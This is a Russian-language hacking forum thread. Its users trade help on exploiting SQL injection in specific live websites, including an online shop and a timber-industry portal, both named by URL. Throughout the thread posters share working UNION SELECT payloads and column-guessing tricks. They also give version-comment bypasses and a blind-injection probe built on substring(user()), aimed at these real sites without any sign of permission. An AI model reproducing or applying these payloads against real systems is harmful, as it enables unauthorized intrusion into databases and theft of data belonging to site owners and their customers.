Вообщем случайно ткнул и нашел баг, как обычно кавычкой теперь вопрос как реализовать, я подставил одну кавыку мне ругалось типа как прально надо и показало друго продуктИД и я постоянно подставлял всё новый и новый ид с кавычкой, пока вообще не исчезла одна строка, теперь вопрос выдает это: Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1,2/*' at line 1 SQL query : select photoID, filesname, thumbnail, enlarged from SS_product_pictures where productID=5656\' union select 1,2/* может кто подскажет как бороться? я в растеренности. как видим это шоп
Значение обрамленно кавычкой, кавычки фильтруються, для того что бы создать правильный запрос тебе надо обойти фильтрацию что сделать думаю будет очень сложно если вообще возможно.
Дык вроде не обрамлено: Code: productID=5656\' тут только его кавычка... 2rubik-nerubik просто не ставь кавычку и раскручивай скулю... после = в запросе поставь: Code: -5656 union select 1,2,3,4/* как я понял, в select там 4 поля
без кавычки никак т.е. пробывал всё, ерроры выскакивают только с ней может есть алтернатива? количество столбцов неизвестно
суди о выводу ошибки. столбцов 4. давай сюда разберемся. если там mag quotes или addslashes и в запроск обрамление в "" то прийдетсо сложно =) давай сюда
дык зачем тебе ерроры... сделай как я сказал и ищи на странице цифры 1,2,3 или 4 если нет этих цифр возможно это blind -inj вобщем без реального линка сложно тебе че нить сказать
ссылку в студию, вполне возможно что кэш прав, и составить новый запрос можно только закрыв предидущий кавычкой
Народ благо не создавать новых тем помогите со скулем http://www.lesprom.ru/html/error.php3?e404'/* Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0 вот такой запрос непрокатывает( надоело поля подбирать да и неверю что их так много) А вот тут http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/* с ордером проблема помогите хотябы поля подобрать.
мускул действительно 3x в нем union select не катит да и пробелы фильтруются Code: http://www.lesprom.ru/html/error.php3?e404'/*!30000asas/* тут у меня не получилось провести инъекцию, хотя ошибка выдается, мож там фильтрация какая нить... а насчет: я вобще не понял о чем ты
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/* вот сайт, я давал кешу и блекберу, они развели руками или чем там ) кстати, кеш автор множества статей по скулю =\
вобщем там mysql 4.1 user()[email protected] Это все делается через подзапросы, но в другом параметре: Code: http://www.cddj.ru/index.php?productID=1312&picture_id=1420%20and%20substring(user(),25,1)=2/* вобщем если выражение верное, то загружаются сразу много картинок, в противном случае картинки незагружаются... версия 4.1 используй подзапросы
